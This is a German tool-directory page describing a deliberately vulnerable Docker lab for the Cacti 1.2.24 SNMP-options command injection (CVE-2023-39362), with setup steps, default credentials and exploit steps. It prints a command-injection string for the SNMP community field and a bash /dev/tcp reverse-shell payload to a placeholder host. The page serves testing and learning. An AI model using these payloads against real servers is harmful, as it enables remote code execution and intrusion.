Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cacti-rce-snmp-options-vulnerable-application — WARNUNG: Dies ist eine verwundbare Anwendung zum Testen des Exploits für die Cacti-Befehlsinjektion (CVE-2023-39362). Führen Sie sie auf eigene Gefahr aus! | Kitploit
Tools/GitHubGitHub/m3ssap0/cacti-rce-snmp-options-vulnerable-application
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCommand and ControlLernen & BildungLabs & Praxis
GitHubm3ssap0/cacti-rce-snmp-options-vulnerable-application

cacti-rce-snmp-options-vulnerable-application

WARNUNG: Dies ist eine verwundbare Anwendung zum Testen des Exploits für die Cacti-Befehlsinjektion (CVE-2023-39362). Führen Sie sie auf eigene Gefahr aus!

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigenWebseite
vor 1 JahrNoch nicht geprüft

Cacti v1.2.24 authentifizierte Befehlsinjektion (CVE-2023-39362) verwundbare Anwendung

Dies ist eine verwundbare Anwendung zum Testen des Exploits für die Cacti-Schwachstelle (CVE-2023-39362).

WARNUNG!

Diese Anwendung enthält schwerwiegende Sicherheitslücken. Nutzung auf eigene Gefahr! Es wird empfohlen, eine gesicherte und abgeschottete Umgebung zu verwenden (z. B. eine VM mit einem aktuellen Snapshot und Host-only-Netzwerk). Laden Sie diese Anwendung nicht auf Server hoch, die mit dem Internet verbunden sind, da diese kompromittiert werden.

HAFTUNGSAUSSCHLUSS: Ich übernehme keine Verantwortung dafür, wie jemand diese Anwendung nutzt. Der einzige Zweck dieser Anwendung ist es, ein Testszenario für den CVE-2023-39362-Exploit zu sein, und sie sollte nicht böswillig verwendet werden. Wenn Ihr Server durch eine Installation dieser Anwendung kompromittiert wird, liegt das nicht in meiner Verantwortung, sondern in der Verantwortung der Person(en), die sie hochgeladen und installiert haben.

Informationen zur Schwachstelle

  • CVE-ID: CVE-2023-39362
  • Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362
  • Beschreibung: In Cacti 1.2.24 kann ein authentifizierter privilegierter Benutzer unter bestimmten Bedingungen eine bösartige Zeichenkette in den SNMP-Optionen eines Geräts verwenden, eine Befehlsinjektion durchführen und Remote-Codeausführung auf dem zugrunde liegenden Server erlangen.

Verwendung

Hier die Schritte zum Einrichten der Umgebung:

  1. Führen Sie docker compose up -d aus, um die Zusammensetzung zu starten.
  2. Sie können die Schritte abschließen, indem Sie http://127.0.0.1/cacti aufrufen, um den Cacti-Initialisierungsassistenten zu starten. Wenn Sie einen Fehler bezüglich der Datenbank erhalten, warten Sie einfach ein wenig und aktualisieren Sie die Seite.
  3. Die Standard-Anmeldedaten sind admin/admin.
  4. Drücken Sie während des Assistenten bei allen Schaltflächen "Next" und wählen Sie die Optionen entsprechend aus. Alle Standardwerte sollten in Ordnung sein und alle obligatorischen Voraussetzungen sollten erfüllt sein.
  5. Melden Sie sich nach der Installation als admin an.
  6. Gehen Sie zu "Console" > "Configuration" > "User".
  7. Klicken Sie auf den Benutzer guest.
  8. Aktivieren Sie ihn, setzen Sie ein Passwort und deaktivieren Sie, falls gewünscht, die Option "Must Change Password at Next Login".
  9. Klicken Sie auf die Schaltfläche "Save".
  10. Gehen Sie zum Abschnitt "Permissions".
  11. Aktivieren Sie unter "General Administration" die Optionen "Console Access" und "Sites/Devices/Data".
  12. Klicken Sie auf die Schaltfläche "Save".
  13. Melden Sie sich ab und melden Sie sich als guest erneut an, um den Exploit auszuprobieren.

Der Container wird vuln-cacti genannt.

Der Hostname für ein Test-SNMP-Gerät ist monitored_snmp_device.

Zum Abräumen der Umgebung verwenden Sie den Befehl docker compose down.

Die offizielle Installationsanleitung von Cacti finden Sie hier.

Grundursache

Eine detaillierte Grundursache der Schwachstelle ist in der ursprünglichen Sicherheitsempfehlung oder in meinem Blogbeitrag verfügbar.

Exploit

(Dies ist nur ein möglicher Exploit)

  1. Gehen Sie zu "Console" > "Create" > "New Device".
  2. Erstellen Sie ein Gerät, das SNMP Version 1 oder 2 unterstützt.
  3. Stellen Sie sicher, dass das Gerät Graphen mit einer oder mehreren Vorlagen von folgenden hat:
    • "Net-SNMP - Combined SCSI Disk Bytes"
    • "Net-SNMP - Combined SCSI Disk I/O"
    • (Das Erstellen des Geräts aus der Vorlage "Net-SNMP Device" erfüllt die Graphen-Voraussetzung)
  4. Verwenden Sie in den "SNMP Options" für das Feld "SNMP Community String" einen Wert wie diesen: public\' ; touch /tmp/m3ssap0 ; \'.
  5. Klicken Sie auf die Schaltfläche "Create".
  6. Prüfen Sie unter /tmp das Vorhandensein der erstellten Datei.

Um eine Reverse Shell zu erhalten, kann ein Payload wie der folgende verwendet werden.

root@kitploit:~
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'

Autoren

  • Antonio Francesco Sardella - Schwachstellenmelder - m3ssap0

Lizenz

Dieses Projekt ist unter der Unlicense lizenziert - siehe die Datei LICENSE für Details.

Tool herunterladen